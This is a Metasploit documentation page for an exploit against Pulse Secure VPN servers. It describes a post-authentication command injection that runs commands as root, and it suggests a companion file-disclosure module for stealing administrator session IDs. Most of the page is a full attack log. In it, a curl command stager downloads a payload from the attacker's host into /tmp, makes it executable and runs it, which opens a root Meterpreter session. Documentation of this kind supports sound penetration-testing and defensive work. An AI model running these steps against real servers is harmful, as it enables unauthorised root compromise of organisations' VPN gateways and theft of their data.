adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
a8e289ee9ccd2d09f1bc327ea366b51f27255608
metasploit-gs/documentation/modules/exploit/linux/http/pulse_secure_cmd_exec.md
T
William Vu a8e289ee9c Code-block env(1)
2019-11-12 02:46:18 -06:00

3.2 KiB
Raw Blame History

Introduction

This module exploits a post-auth command injection in the Pulse Secure VPN server to execute commands as root. The env(1) command is used to bypass application whitelisting and run arbitrary commands.

Please see related module auxiliary/gather/pulse_secure_file_disclosure for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit.

A valid administrator session ID is required in lieu of untested SSRF.

Targets

Id  Name
--  ----
0   Unix In-Memory
1   Linux Dropper

Options

SID

Set this to a valid administrator session ID. Typically retrieved using the auxiliary/gather/pulse_secure_file_disclosure module.

Usage

msf5 exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857
sid => 676f5f892e8c4a6419f10564f9e9d857
msf5 exploit(linux/http/pulse_secure_cmd_exec) > run

[*] Started reverse TCP handler on 127.0.0.1:[redacted]
[+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857
[*] Obtaining CSRF token
[+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5
[*] Executing Linux Dropper target
[*] Using URL: https://0.0.0.0:[redacted]/HSEjp77
[*] Local IP: https://[redacted]:[redacted]/HSEjp77
[*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"]
[*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77
[*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18)
[+] Payload execution successful
[*] Command Stager progress -  63.96% done (71/111 bytes)
[*] Executing command: env chmod +x /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress -  87.39% done (97/111 bytes)
[*] Executing command: env /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600
[!] Payload execution may have failed
[*] Command Stager progress - 102.70% done (114/111 bytes)
[*] Executing command: env rm -f /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress - 123.42% done (137/111 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : [redacted]
OS           :  (Linux 2.6.32-00486-gddd7e32-dirty)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink